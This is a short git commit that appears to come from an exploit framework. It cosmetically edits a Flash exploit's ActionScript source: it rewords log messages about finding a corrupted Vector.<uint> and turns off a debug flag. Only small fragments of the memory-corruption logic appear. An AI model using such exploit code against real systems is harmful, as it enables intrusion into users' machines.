Unset debug flag

This commit is contained in:
jvazquez-r7
2015-06-09 11:36:09 -05:00
parent b7f0fad72f
commit 39851d277d
3 changed files with 3 additions and 3 deletions
Binary file not shown.
+2 -2
View File
@@ -66,7 +66,7 @@ package
try {
var uint_vector_pos:uint = search_uint_vector()
} catch (err:Error) {
Logger.log("Vector.<uint> not found :(")
Logger.log("[!] Exploit - Corrupted Vector.<uint> not found")
return
}
@@ -76,7 +76,7 @@ package
for (i = 0; i < ov.length; i++) {
if (ov[i].length > 1024) {
uv = ov[i]
Logger.log("Vector.<uint> corrupted found :)")
Logger.log("[*] Exploit - Corrupted Vector.<uint> found")
} else {
ov[i] = null
}
+1 -1
View File
@@ -3,7 +3,7 @@ package
import flash.external.ExternalInterface
public class Logger {
private static const DEBUG:uint = 1
private static const DEBUG:uint = 0
public static function alert(msg:String):void
{